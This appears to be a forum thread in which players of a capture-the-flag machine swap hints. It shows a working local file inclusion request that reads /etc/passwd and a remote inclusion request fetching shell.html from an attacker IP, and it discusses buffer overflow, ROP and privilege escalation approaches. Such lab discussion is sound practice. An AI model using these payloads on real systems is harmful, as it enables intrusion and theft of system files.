Working LFI
GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1

RFI works too but no execution
GET /index.php?page=http://10.10.x.y/shell.html

no proc/self/environ access
no prof/self/fd access
no php wrappers

log poisoning doesn't appear to work (nginx + php) there is fact cgi but seems protected there too.

anyone?

Possibly some form of file upload and file write to disk via beta.html + activate_licence.php . Then try have the index.php execute it via PHP readpage?or SSRF to the internal service runnong on 127.0.0.1 1337 perhaps?[hr]index.php[code][/code]beta.html - form submission[code]

Upload License Key File Submit

[/code]activate_license.php[code][/code]

anyone got foothold?

damn, looks like buffer overflow./prod/sched_debugtheres a process activate_license you can curl the ELF binary via the LFI -> /proc//exe

it's a buffer overflow then for root you just have to exploit binfmt_misc

but how?

So NX and PIE are enabled on the ELF binary, meaning we can't do a standard Buffer overflow.. is that right??

Buffer is 512+ bytes to overflow and once overflowed it is no longer stored in sqllite as a blob, but the full string so you can see it there, as well as via GDB.

but what next?

spain without the S

ok so becos RELRO is enabled on the binary, that means we can't use a PLT + GOT ret2libc - is that right?

so what's the ROP approach we have to take then or am i overthinkn it?

(April 5, 2022, 04:21 AM)skyweasel Wrote: ok so becos RELRO is enabled on the binary, that means we can't use a PLT + GOT ret2libc - is that right?

so what's the ROP approach we have to take then or am i overthinkn it?

I couldn't figure out yet but I'm very curious. I wish someone here could share some foothold steps or hints